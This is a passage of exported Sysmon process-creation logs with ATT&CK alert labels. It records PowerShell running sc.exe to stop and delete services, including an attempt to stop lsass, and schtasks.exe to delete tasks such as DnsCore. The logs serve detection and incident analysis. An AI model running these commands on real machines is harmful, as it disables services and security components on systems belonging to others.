{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.673"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001067082e00}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.553",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.623 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100f062e00} +ProcessId: 6348 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.627848300Z"",""eventRecordID"":""3356"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.623\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00100f062e00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.623"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00100f062e00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.504",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.581 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001064042e00} +ProcessId: 1664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.585919000Z"",""eventRecordID"":""3354"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.581\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001064042e00}\r\nProcessId: 1664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.581"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001064042e00}"",""processId"":""1664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.483",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.551 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109d032e00} +ProcessId: 7712 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.553892300Z"",""eventRecordID"":""3353"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.551\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109d032e00}\r\nProcessId: 7712\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.551"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00109d032e00}"",""processId"":""7712"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.438",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.498 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010e7002e00} +ProcessId: 8032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.501838100Z"",""eventRecordID"":""3350"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.498\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010e7002e00}\r\nProcessId: 8032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.498"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010e7002e00}"",""processId"":""8032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.179",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.799 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100a142c00} +ProcessId: 1380 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.828694000Z"",""eventRecordID"":""3341"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.799\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100a142c00}\r\nProcessId: 1380\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.799"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00100a142c00}"",""processId"":""1380"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.149",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.757 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bc112c00} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.763241600Z"",""eventRecordID"":""3340"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.757\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010bc112c00}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.757"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010bc112c00}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 